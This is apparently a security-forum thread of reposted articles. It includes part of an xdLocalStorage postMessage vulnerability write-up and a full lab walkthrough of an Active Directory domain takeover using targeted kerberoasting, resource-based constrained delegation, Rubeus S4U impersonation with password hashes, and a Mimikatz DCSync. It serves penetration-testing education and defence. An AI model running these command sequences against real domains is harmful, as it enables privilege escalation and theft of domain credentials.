“magic iframe”, therefore exploitation would include winning a race condition. In order to exploit this issue an attacker would need to entice a user to load a malicious site, which then interacts with the legitimate client site. Exact exploitation of this issue would depend on how the vulnerable application uses the data they intended to retrieve from local storage, analysis of the functionality would be required in order to identify a valid attack vector. Wildcard targetOrigin when sending messages Magic iframe – CVE-2020-11610 The postData() function in xdLocalStoragePostMessageApi.js specifies the wildcard (*) as the targetOrigin when calling the postMessage() function on the parent object. Therefore any domain can load the application hosting the “magical iframe” and receive the messages that the “magical iframe” sends. In order to exploit this issue an attacker would need to entice a user to load a malicious site, which then interacts with the legitimate site hosting the “magical iframe” and receives any messages it sends as a result of the interaction. Note that this issue can be combined with the lack of origin validation to recover all information from local storage. An attacker could first retrieve the length of local storage and then iterate through each key index and the “magical iframe” would send the key and value to the parent, which in this case would be the attacker’s domain. Client – CVE-2020-11611 The buildMessage() function in xdLocalStorage.js specifies the wildcard (*) as the targetOrigin when calling the postMessage() function on the iframe object. Therefore any domain that is currently loaded within the iframe can receive the messages that the client sends. In order to exploit this issue an attacker would need to redirect the “magical iframe” loaded on the vulnerable application within the user’s browser to a domain they control. This is non trivial but there may be some scenarios where this can occur. If an attacker were able to successfully exploit this issue they would have access to any information that the client sends to the iframe, and also be able to send messages back with a valid requestId which would then be processed by the client, this may then further impact the security of the client application. How Wide Spread is the Issue in xdLocalStorage? At the time of writing all versions of xdLocalStorage (previously called cross-domain-local-storage) are vulnerable – i.e release 1.0.1 (released 2014-04-17) to 2.0.5 (released 2017-04-14). According to the project README the recommended method of installing is via bower or npm. npmjs.com shows that the library has around 350 weekly downloads (March 2020). https://npmjs.com/package/xdlocalstorage (2020-03-20) Defence xdLocalStorage This issue has been known since at least August 2015 when Hengjie opened an Issue on the GitHub repository to notify the project owner (https://github.com/ofirdagan/cross-domain-local-storage/issues/17). However the Pull request which included functionality to whitelist origins has not been accepted or worked on since July 2016 (https://github.com/ofirdagan/cross-domain-local-storage/pull/19). The last commit on the project (at the time of writing) was in August 2018. Therefore a fix from the project maintainer may not be forthcoming. Consider replacing this library with a maintained alternative which includes robust origin validation, or implement validation within the existing library. Web Messaging Refer to the OWASP HTML 5 Security Cheat Sheet. When sending a message explicitly state the targetOrigin (do not use the wildcard *) When receiving a message carefully validate the origin of any message to ensure it is from an expected source. When receiving a message carefully validate the data to ensure it is in the expected format and safe to use in the context it is in (e.g. HTML markup within the data may not be safe to embed directly into the page as this would introduce DOM Based Cross Site Scripting). Web Storage Refer to the OWASP HTML5 Security Cheat Sheet. Sursa: https://grimhacker.com/2020/04/02/exploiting-xdlocalstorage-localstorage-and-postmessage/
-
Chaining multiple techniques and tools for domain takeover using RBCD Reading time ~26 min Posted by Sergio Lazaro on 09 March 2020 Categories: Active directory, Internals, Bloodhound, Dacls, Mimikatz, Powerview, Rubeus Intro In this blog post I want to show a simulation of a real-world Resource Based Constrained Delegation attack scenario that could be used to escalate privileges on an Active Directory domain. I recently faced a network that had had several assessments done before. Luckily for me, before this engagement I had used some of my research time to understand more advanced Active Directory attack concepts. This blog post isn’t new and I used lots of existing tools to perform the attack. Worse, there are easier ways to do it as well. But, this assessment required different approaches and I wanted to show defenders and attackers that if you understand the concepts you can take more than one path. The core of the attack is about abusing resource-based constrained delegation (RBCD) in Active Directory (AD). Last year, Elad Shamir wrote a great blog post explaining how the attack works and how it can result in a Discretionary Access Control List (DACL)-based computer object takeover primitive. In line with this research, Andrew Robbins and Will Schroeder presented DACL-based attacks at Black Hat back in 2017 that you can read here. To test the attacks I created a typical client network using an AWS Domain Controller (DC) with some supporting infrastructure. This also served as a nice addition to our Infrastructure Training at SensePost by expanding the modern AD attack section and practicals. We’ll be giving this at BlackHat USA. The attack is demonstrated against my practise environment. Starting Point After some time on the network, I was able to collect local and domain credentials that I used in further lateral movement. However, I wasn’t lucky enough to compromise credentials for users that were part of the Domain Admins group. Using BloodHound, I realised that I had compromised two privileged groups with the credentials I gathered: RMTAdmins and MGMTAdmins. The users from those groups that will be used throughout the blogpost are: RONALD.MGMT (cleartext credentials) (Member of MGMTAdmins) SVCRDM (NTLM hash) (Member of RMTADMINS) One – The user RONALD.MGMT was configured with interesting write privileges on a user object. If the user was compromised, the privileges obtained would create the opportunity to start a chain of attacks due to DACL misconfigurations on multiple users. To show you a visualisation, BloodHound looked as follows: Figure 1 – DACL attack path from RONALD.MGMT to SVCSYNC user. According to Figure 1, the SVCSYNC user was marked as a high value target. This is important since this user was able to perform a DCSync (due to the GetChanges & GetChangesAll privileges) on the main domain object: Figure 2 – SVCSYNC had sufficient privileges on the domain object to perform a DCSync. Two – The second user, SVCRDM, was part of a privileged group able to change the owner of a DC computer due to the WriteOwner privilege. The privileges the group had were applied to all the members, effectively granting SVCRDM the WriteOwner privilege. BloodHound showed this relationship as follows: Figure 3 – SVCRDM user, member of RMTADMINS, had WriteOwner privileges over the main DC. With these two graphs BloodHound presented, there were two different approaches to compromise the domain: Perform a chain of targeted kerberoasting attacks to compromise the SVCSYNC user to perform a DCSync. Abuse the RBCD attack primitive to compromise the DC computer object. Targeted Kerberoasting There are two ways to compromise a user object when we have write privileges (GenericWrite/GenericAll/WriteDacl/WriteOwner) on the object: we can force a password reset or we can rely on the targeted kerberoasting technique. For obvious reasons, forcing a password reset on these users wasn’t an option. The only option to compromise the users was a chain of targeted kerberoasting attacks to finally reach the high value target SVCSYNC. Harmj0y described the targeted kerberoasting technique in a blog post he wrote while developing BloodHound with _wald0 and @cptjesus. Basically, when we have write privileges on a user object, we can add the Service Principal Name (SPN) attribute and set it to whatever we want. Then kerberoast the ticket and crack it using John/Hashcat. Later, we can remove the attribute to clean up the changes we made. There are a lot of ways to perform this attack. Probably the easiest way is using PowerView. However, I chose to use Powershell’s ActiveDirectory module and impacket. According to Figure 2, my first target was SUSANK on the road to SVCSYNC. Since I had the credentials of RONALD.MGMT I could use Runas on my VM to spawn a PowerShell command line using RONALD.MGMT’s credentials: runas /netonly /user:ronald.mgmt@maemo.local powershell Runas is really useful as it spawns a CMD using the credentials of a domain user from a machine which isn’t part of the domain. The only requirement is that DNS resolves correctly. The /netonly flag is important because the provided credentials will only be used when network resources are accessed. Figure 4 – Spawning Powershell using Runas with RONALD.MGMT credentials. In the new PowerShell terminal, I loaded the ActiveDirectory PowerShell module to perform the targeted kerberoast on the user I was interested in (SUSANK in this case). Below are the commands used to add a new SPN to the account: Import-Module ActiveDirectory Get-ADUser susank -Server MAEMODC01.maemo.local Set-ADUser susank -ServicePrincipalNames @{Add="sensepost/targetedkerberoast"} -Server MAEMODC01.maemo.local Figure 5 – Targeted Kerberoast using ActiveDirectory Powershell module. After a new SPN is added, we can use impacket’s GetUserSPNs to retrieve Ticket Granting Service Tickets (TGS) as usual: Figure 6 – Impacket’s GetUserSPNs was used to request the Ticket-Granting-Service (TGS) of every SPN. In the lab there weren’t any other SPN’s configured although in the real world there’s likely to be more. TGS tickets can be cracked as portions of the ticket are encrypted using the target users’s Kerberos 5 TGS-REP etype 23 hash as the private key, making it possible to obtain the cleartext password of the target account in an offline brute force attack. In this case, I used Hashcat: Figure 7 – The TGS obtained before was successfuly cracked using Hashcat. Once the user SUSANK was compromised, I repeated the same process with the other users in order to reach the high value target SVCSYNC. However, I had no luck when I did the targeted kerberoasting attack and tried to crack the tickets of PIERREQA and JUSTINC users, both necessary steps in the path. Thus, I had to stop following this attack path. However, having the ability to add the serviceprincipalname attribute to a user was really important in order to compromise the DC later by abusing the RBCD computer object primitive. Keep this in mind as we’ll come back later to SUSANK. Resource-based Constrained Delegation (RBCD) I’m not going to dig into all of the details on how a RBCD attack works. Elad wrote a really good blog post called “Wagging the Dog: Abusing Resource-Based Constrained Delegation to Attack Active Directory” that explains all the concepts I’m going to use. If you haven’t read it, I suggest you stop here and spend some time trying to understand all the requirements and concepts he explained. It’s a long blog post, so grab some coffee As a TL;DR, I’ll list the main concepts you’ll need to know to spot and abuse Elad’s attack: Owning an SPN is required. This can be obtained by setting the serviceprincipalname attribute on a user object when we have write privileges. Another approach relies on abusing a directories MachineAccountQuota to create a computer account which by default, comes with the serviceprincipalattribute set. Write privileges on the targeted computer object are required. These privileges will be used to configure the RBCD on the computer object and the user with the serviceprincipalname attribute set. The RBCD attack involves three steps: request a TGT, S4U2Self and S4U2Proxy. S4U2Self works on any account that has the serviceprincipalname attribute set. S4U2Self allows us to obtain a valid TGS for arbitrary users (including sensitive users such as Domain Admins group members). S4U2Proxy always produces a forwardable TGS, even if the TGS used isn’t forwardable. We can use Rubeus to perform the RBCD attack with a single command. One of the requirements, owning a SPN, was already satisfied due to the targeted kerberoasting attack performed to obtain SUSANK’s credentials. I still needed write privileges on the targeted computer which in this case was the DC. Although I didn’t have write privileges directly, I had WriteOwner privileges with the second user mentioned in the introduction, SVCRDM. Figure 8 – SVCRDM could have GenericAll privileges if the ownership of MAEMODC01 was acquired. An implicit GenericAll ACE is applied to the owner of an object, which provided an opportunity to obtain the required write privileges. In the next section I explain how I changed the owner of the targeted computer using Active Directory Users & Computers (ADUC) in combination with Rubeus. Later on, a simulated attack scenario showing how to escalate privileges within AD in a real environment by abusing the RBCD computer takeover primitive is shown. Ticket Management with Rubeus Since the SVCRDM user was part of the RMTADMINS group, which could modify the owner of the DC, it was possible to make SVCRDM, or any other user I owned, the owner of the DC. Being the owner of an object would grant GenericAll privileges. However, I only had the NTLM hash for the SVCRDM user, so I chose to authenticate with Kerberos. In order to do that, I used Rubeus (thank you to Harmj0y and all the people that contributed to this project). To change the owner of the DC I had to use the SVCRDM account. An easy way to change the owner of an AD object is by using PowerView. Another way to apply the same change would be by using ADUC remotely. ADUC allows us to manage AD objects such as users, groups, Organization Units (OU), as well as their attributes. That means that we can use it to update the owner of an object given the required privileges. Since I couldn’t crack the hash of SVCRDM’s password, I wasn’t able to authenticate using SVCRDM’s credentials but it was possible to request a Kerberos tickets for this account using Rubeus and the hash. Later, I started ADUC remotely from my VM to change the owner of the targeted DC. It’s out of the scope of this blog to explain how Kerberos works, please refer to the Microsoft Kerberos docs for further details. On a VM (not domain-joined), I spawned cmd.exe as local admin using runas with the user SVCRDM. This prompt allowed me to request and import Kerberos tickets to authenticate to domain services. I ran runas with the /netonly flag to ensure the authentication is only performed when remote services are accessed. As I had used the /netonly flag and had I chosen to authenticate using Kerberos tickets, the password I gave runas wasn’t the correct one. runas /netonly /user:svcrdm@maemo.local cmd Figure 9 – Starting Runas with the SVCRDM domain user and a wrong password. In the terminal running as the SVCRDM user, I used Rubeus to request a Ticket-Granting-Ticket (TGT) for this user. The /ptt (pass-the-ticket) parameter is important to automatically add the requested ticket into the current session. Rubeus.exe asktgt /user:SVCRDM /rc4:a568802050cd83b8898e5fb01ddd82a6 /ptt /domain:maemo.local /dc:MAEMODC01.maemo.local Figure 10 – Requesting a TGT for the SVCRDM user with Rubeus. In order to access a certain service using Kerberos, a Ticket-Granting-Service (TGS) ticket mis required. By presenting the TGT, I was authorised to request a TGS to access the services I was interested on. These services were the LDAP and CIFS services on the DC. We can use Rubeus to request these two TGS’. First, I requested the TGS for the LDAP service: Rubeus.exe asktgs /ticket:[TGT_Base64] /service:ldap/MAEMODC01.maemo.local /ptt /domain:maemo.local /dc:MAEMODC01.maemo.local Figure 11 – Using the previous TGT to obtain a TGS for the LDAP service on MAEMODC01. In the same way, I requested a TGS for the CIFS service of the targeted DC: Rubeus.exe asktgs /ticket:[TGT_Base64] /service:cifs/MAEMODC01.maemo.local /ptt /domain:maemo.local /dc:MAEMODC01.maemo.local Figure 12 – Using the previous TGT to obtain a TGS for the CIFS service on MAEMODC01. The tickets were imported successfully and can be listed in the output of the klist command: Figure 13 – The requested Kerberos tickets were imported successfully in the session. Literally Owning the DC With the Kerberos tickets imported, we can start ADUC and use it to modify the targeted Active Directory environment. As with every other program, we can start ADUC from the terminal. In order to do it, I used mmc, which requires admin privileges. This is why the prompt I used to start runas and request the Kerberos tickets required elevated privileges. Because of the SVCRDM Kerberos ticket imported in the session, we’ll be able to connect to the DC without credentials being provided. To start ADUC I typed the following command: mmc %SystemRoot%\system32\dsa.msc After running this command, ADUC gave an error saying that the machine wasn’t domain joined and the main frame was empty. No problem, just right-click the “Active Directory Users and Computers” on the left menu to choose the option “Change Domain Controller…”. There, the following window appeared: Figure 14 – Selecting the Directory Server on ADUC. After adding the targeted DC, Figure 14 shows the status as “Online” so I clicked “OK” and I was able to see all the AD objects: Figure 15 – AD objects of the MAEMO domain were accessible remotely using ADUC. Every AD object has a tab called “Security” which includes all the ACEs that are applied to it. This tab isn’t enabled by default and it must be activated by clicking on View > Advanced Features. At this point, I was ready to take ownership of the DC. Accessing the MAEMODC01 computer properties within the Domain Controllers OU and checking the advanced button on the “Security” tab, I was able to see that the owners were the Domain Admins: Figure 16 – MAEMODC01 owned by the Domain Admins group. The user SVCRDM had the privilege to change the owner so I clicked on “Change” and selected the SVCRDM user: Figure 17 – MAEMODC01 owner changed to the user SVCRDM. If you have a close look to Figure 17, most of the buttons are disabled because of the limited permissions granted to SVCRDM. Changing the owner is the only option available. As I said before, ownership of an object implies GenericAll privileges. After all these actions, I wanted to make everything a bit more comfortable for me, so I added the user RONALD.MGMT with GenericAll privileges on the MAEMODC01 object for use later. The final status of the DACL for the MAEMODC01 object looked as follows: Figure 18 – User RONALD.MGMT with Full Control (GenericAll) on the MAEMODC01. Computer Object Takeover According to Elad Shamir’s blog post (that I still highly encourage you to read), one of the requirements to weaponise the S4U2Self and S4U2Proxy process with the RBCD is to have control over an SPN. I ran a targeted Kerberoast attack to take control of SUSANK so that requirement was satisfied as this user had the serviceprincipalname attribute set. If it isn’t possible to get control of an SPN, we can use Powermad by Kevin Robertson to abuse the default machine quota and create a new computer account which will have the serviceprincipalname attribute set by default. In the Github repository, Kevin mentioned the following: The default Active Directory ms-DS-MachineAccountQuota attribute setting allows all domain users to add up to 10 machine accounts to a domain. Powermad includes a set of functions for exploiting ms-DS-MachineAccountQuota without attaching an actual system to AD. Before abusing the computer object takeover primitive, some more requirements needed to be met. The GenericAll privileges I set up for RONALD.MGMT previously would allow me to write the necessary attributes of the targeted DC. This is important because I needed to add an entry for the msDS-AllowedToActOnBehalfOfOtherIdentity attribute on the targeted computer (the DC) that pointed back to the SPN I controlled (SUSANK). This configuration will be abused to impersonate any user in the domain, including high privileged accounts such as the Domain Admins group members: Figure 19 – Domain Admins group members. The following details are important in order to abuse the DACL computer takeover: The required SPN is SUSANK. The targeted computer is MAEMODC01, the DC of the maemo.local domain. The user RONALD.MGMT has GenericAll privileges on MAEMODC01. The required tools are PowerView and Rubeus. I had access to a lot of systems due to the compromise of both groups RMTAdmins and MGMTAdmins. I used the privileges I had to access a domain joined Windows box. There, I loaded PowerView in memory since, in this case, an in-memory PowerShell script execution wasn’t detected. Harmj0y detailed how to take advantage of the previous requirements in this blog post. During the assessment, I followed his approach but did not need to create a computer account as I already owned an SPN. Harmj0y also provided a gist containing all the commands needed. Running PowerShell with RONALD.MGMT user, the first thing we need are the SIDs of the main domain objects involved: RONALD.MGMT and MAEMODC01.maemo.local. Although it wasn’t necessary, I validated the privileges the user RONALD.MGMT had on the targeted computer to double-check the GenericAll privileges I granted it with. I used Get-DomainUser and Get-DomainObjectAcl. #First, we get ronald.mgmt (attacker) SID $TargetComputer = "MAEMODC01.maemo.local" $AttackerSID = Get-DomainUser ronald.mgmt -Properties objectsid | Select -Expand objectsid $AttackerSID #Second, we check the privileges of ronald.mgmt on MAEMODC01 $ACE = Get-DomainObjectAcl $TargetComputer | ?{$_.SecurityIdentifier -match $AttackerSID} $ACE #We can validate the ACE applies to ronald.mgmt ConvertFrom-SID $ACE.SecurityIdentifier Figure 20 – Obtaining the attacker SID and validating its permissions on the targeted computer. The next step was to configure the msDS-AllowedToActOnBehalfOfOtherIdentity attribute for the owned SPN on the targeted computer. Using Harmj0y’s template I only needed the service account SID to prepare the array of bytes for the security descriptor that represents this attribute. #Now, we get the SID for our SPN user (susank) $ServiceAccountSID = Get-DomainUser susank -Properties objectsid | Select -Expand objectsid $ServiceAccountSID #Later, we prepare the raw security descriptor $SD = New-Object Security.AccessControl.RawSecurityDescriptor -Argument "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ServiceAccountSID))" $SDBytes = New-Object byte[] ($SD.BinaryLength) $SD.GetBinaryForm($SDBytes, 0) Figure 21 – Creating the raw security descriptor including the SPN SID for the msDS-AllowedToActOnBehalfOfOtherIdentity attribute. Then, I added the raw security descriptor forged earlier, to the DC, which was possible due to the GenericAll rights earned after taking ownership of the DC. # Set the raw security descriptor created before ($SDBytes) Get-DomainComputer $TargetComputer | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} # Verify the security descriptor was added correctly $RawBytes = Get-DomainComputer $TargetComputer -Properties 'msds-allowedtoactonbehalfofotheridentity' | Select -Expand msds-allowedtoactonbehalfofotheridentity $Descriptor = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList $RawBytes, 0 $Descriptor.DiscretionaryAcl Figure 22 – The raw security descriptor forged before was added to the targeted computer. With all the requirements fulfilled, I went back to my Windows VM. There, I spawned cmd.exe via runas /netonly using SUSANK’s compromised credentials: Figure 23 – New CMD prompt spawned using Runas and SUSANK credentials. Since I didn’t have SUSANK’s hash, I used Rubeus to obtain it from the cleartext password: Figure 24 – Obtaining the password hashes with Rubeus. Elad included the S4U abuse technique in Rubeus and we can perform this attack by running a single command in order to impersonate a Domain Admin (Figure 19), in this case, RYAN.DA: Rubeus.exe s4u /user:susank /rc4:2B576ACBE6BCFDA7294D6BD18041B8FE /impersonateuser:ryan.da /msdsspn:cifs/MAEMODC01.maemo.local /dc:MAEMODC01.maemo.local /domain:maemo.local /ptt Figure 25 – S4U abuse with Rubeus. TGT request for SUSANK. Figure 26 – S4U abuse with Rubeus. S4U2self to get a TGS for RYAN.DA. Figure 27 – S4U abuse with Rubeus. S4U2Proxy to impersonate RYAN.DA and access the CIFS service on the targeted computer. The previous S4U abuse imported a TGS for the CIFS service due to the /ptt option in the session. A CIFS TGS can be used to remotely access the file system of the targeted system. However, in order to perform further lateral movements I chose to obtain a TGS for the LDAP service and, since the impersonated user is part of the Domain Admins group, I could use Mimikatz to run a DCSync. Replacing the previous Rubeus command to target the LDAP service can be done as follows: Rubeus.exe s4u /user:susank /rc4:2B576ACBE6BCFDA7294D6BD18041B8FE /impersonateuser:ryan.da /msdsspn:ldap/MAEMODC01.maemo.local /dc:MAEMODC01.maemo.local /domain:maemo.local /ptt Listing the tickets should show the two TGS obtained after running the S4U abuse: Figure 28 – CIFS and LDAP TGS for the user RYAN.DA. With these TGS (DA account) I was able to run Mimikatz to perform a DCSync and extract the hashes of sensitive domain users such as RYAN.DA and KRBTGT: Figure 29 – DCSync with Mimikatz to obtain RYAN.DA hashes. Figure 30 – DCSync with Mimikatz to obtain KRBTGT hashes. Since getting DA is just the beginning, the obtained hashes can be used to move lateraly within the domain to find sensitive information to show the real impact of the assessment. Clean Up Operations Once the attack has been completed successfully, it doesn’t make sense to leave domain objects with configurations that aren’t needed. Actually, these changes could be a problem in the future. For this reason, I considered it was important to include a cleanup section. Remove the security descriptor msDS-AllowedToActOnBehalfOfOtherIdentity configured in the targeted computer. The security descriptor can be removed by using PowerView: Get-DomainComputer $TargetComputer | Set-DomainObject -Clear 'msds-allowedtoactonbehalfofotheridentity' Clean-up the GenericAll ACE included in the targeted computer for the RONALD.MGMT user. Due to this ACE being added when using ADUC, I used SVCRDM to remove it. Just select the RONALD.MGMT Full Control row and delete it. Replace the targeted computer owner with the Domain Admins group. One more time, using ADUC with the SVCRDM user, I selected the Change section to modify the owner back to the Domain Admins group. Remove the serviceprincipalname attribute on SUSANK. Using the ActiveDirectory Powershell module, I ran the following command to remove the SPN attribute configured on SUSANK: Set-ADUser susank -ServicePrincipalName @{Remove="sensepost/targetedkerberoast"} -Server MAEMODC01.maemo.local Conclusions In this blog post I wanted to show a simulation of a real attack scenario used to escalate privileges on an Active Directory domain. As I said in the beginning, none of this is new and the original authors did a great job with their research and the tools they released. Some changes could be applied using different tools to obtain the exact same results. However, the main goal of this blog post was to show different ways to reach the same result. Some of the actions performed in this blog post could be done in a much easier way by just using a single tool such as PowerView. A good example is the way I chose to modify the owner of the DC. The point here was to show that by mixing concepts such as Kerberos tickets and some command line tricks, we can use ADUC remotely without a cleartext password. Although it required more steps, using all this stuff during the assessment was worth it! BloodHound is a useful tool for Active Directory assessments, especially in combination with other tools such as Rubeus and PowerView. AD DACL object takeovers are easier to spot and fix or abuse, bringing new ways to elevate privileges in a domain. Elad’s blog post is a really useful resource full of important information on how delegation can be used and abused. With this blog post I wanted to show you that, although it’s possible that we don’t have all the requirements to perform an attack, with a certain level of privileges we can configure everything we need. As with any other technique while doing pentests, we can chain different misconfigurations to reach a goals such as the Domain Admin. Although getting a DA account isn’t the goal of every pentest, it’s a good starting point to find sensitive information in the internal network of a company. References Links: https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html https://www.harmj0y.net/blog/activedirectory/a-case-study-in-wagging-the-dog-computer-takeover/ https://www.blackhat.com/docs/us-17/wednesday/us-17-Robbins-An-ACE-Up-The-Sleeve-Designing-Active-Directory-DACL-Backdoors-wp.pdf https://wald0.com/?p=68 https://adsecurity.org/?p=1729 If you find any glaring mistakes or have any further questions do not hesitate on sending an email to sergio [at] the domain of this blog. Sursa: https://sensepost.com/blog/2020/chaining-multiple-techniques-and-tools-for-domain-takeover-using-rbcd/
-
Recomandare: https://app.pluralsight.com/profile/author/jared-demott
-
About CyberEDU Platform & Exercises We took over the mission to educate and teach the next generation of infosec specialists with real life hacking scenarios having different levels of difficulty depending on your knowledge set. It's a dedicated environment for practicing their offensive and defensive skills. 100 exercises used in international competitions ready to be discovered Our experts created a large variety of challenges covering different aspects of the infosec field. All challenges are based on real life scenarios which are meant to teach students how to spot vulnerabilities and how to react in different situations. Link: https://cyberedu.ro/
-
- 5
-
-
-
-
Expectations: "Ma duc in politie/armata ca sa apar oamenii cu arma in mana si cu riscul vietii!" Reality: "Duc prescura si lumina batranilor"